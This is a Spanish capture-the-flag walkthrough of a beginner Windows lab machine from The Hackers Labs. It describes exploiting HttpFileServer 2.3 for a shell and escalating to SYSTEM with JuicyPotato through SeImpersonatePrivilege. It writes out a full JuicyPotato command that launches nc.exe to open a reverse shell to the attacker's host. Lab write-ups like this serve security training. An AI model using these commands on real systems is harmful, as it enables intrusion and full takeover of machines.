THL Espeto Malagueño — Windows
Esta es una máquina de The Hackers Labs de nivel Principiante
Para poder hacer uso de esta máquina primero debemos descargar el archivo y así poder desplegar el laboratorio.
Descargamos el archivo de la página https://thehackerslabs.com/
Al momento de descargar esta máquina y descomprimir el archivo, en este caso observamos un archivo.
Para desplegar el laboratorio usaremos nuestro hipervisor favorito y podemos observar que se trata de un Windows.
Ya que no sabemos la dirección IP lo que realizaremos es un escaneo de la red con arp-scan
, al enviar el comando podemos observar que tenemos varias direcciones.
Realizamos un ping a las direcciones para detectar cuál es la Windows y podemos observar que la dirección 192.168.0.13
es la máquina objetivo debido al ttl
.
Realizamos un escaneo de puertos y podemos observar varios puertos habilitados.
Con los puertos identificados primero revisamos el puerto 80, para ello ingresamos la dirección IP en el navegador y podemos observar lo siguiente.
Revisando la página podemos ver que se trata de un httpFileServer 2.3
, buscando algún exploit tenemos varias para esta versión. Por ello usaremos el siguiente exploit.
Antes de ejecutarlo agregamos nuestra IP e ingresamos un puerto.
Ahora debemos tener el nc.exe
y lo copiamos.
Iniciamos nuestro servidor HTTP y nuestro listener.
Ejecutamos usando Python2
Luego de varios intentos observamos que obtuvimos conexión.
Realizamos un dir
y podemos observar el flag de este usuario.
Para poder escalar privilegios lo que debemos hacer es verificar privilegios. Primero comprobamos la información del sistema.
Listamos los permisos de privilegios realizando el siguiente comando.
whoami /priv
Observamos que tenemos el permiso SeImpersonatePrivilege
lo cual es muy bueno para nosotros, ya que de esta manera podemos escalar.
Con ello en mente descargaremos JuicyPotato. Para pasar el archivo a la máquina víctima en nuestra máquina arrancaremos un servicio samba.
Copiamos tanto el Juicy
como el nc.exe
en la máquina víctima.
Luego de realizar ello volvemos a ejecutar un nuevo listener.
En la shell de Windows enviaremos el siguiente comando.
JuicyPotato.exe -l 6666 -t * -p C:\Windows\System32\cmd.exe -a "/c C:\Users\hacker\Downloads\nc.exe -e cmd.exe 192.168.0.5 4455"
Después de enviar el comando y si ingresamos los valores correctos podemos observar en nuestro listener que ya obtuvimos conexión.
Si realizamos un whoami
podemos observar que somos nt authority\system
. De esta manera culminando esta máquina.